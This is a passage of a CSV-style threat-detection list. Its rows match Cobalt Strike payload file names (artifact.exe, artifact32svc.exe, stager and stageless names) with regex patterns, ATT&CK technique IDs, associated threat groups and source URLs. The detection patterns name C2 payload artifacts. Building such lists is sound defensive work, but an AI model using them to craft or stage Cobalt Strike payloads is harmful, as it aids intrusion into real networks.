T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34081" "*artifact.exe*",".{0,1000}artifact\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34082" "*artifact.x64.exe*",".{0,1000}artifact\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 
- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34083" "*artifact.x86.dll*",".{0,1000}artifact\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34084" "*artifact.x86.exe*",".{0,1000}artifact\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34085" "*artifact_payload*",".{0,1000}artifact_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","34086" "*artifact_stageless*",".{0,1000}artifact_stageless.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - 
Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","34087" "*artifact_stager*",".{0,1000}artifact_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","34088" "*artifact32*.exe*",".{0,1000}artifact32.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations 
and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34089" "*artifact32.dll*",".{0,1000}artifact32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34090" "*artifact32.exe*",".{0,1000}artifact32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34091" "*artifact32big.dll*",".{0,1000}artifact32big\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34092" "*artifact32big.exe*",".{0,1000}artifact32big\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34093" "*artifact32svc.exe*",".{0,1000}artifact32svc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34094" "*artifact32svcbig.exe*",".{0,1000}artifact32svcbig\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34095" "*artifact64*.exe*",".{0,1000}artifact64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
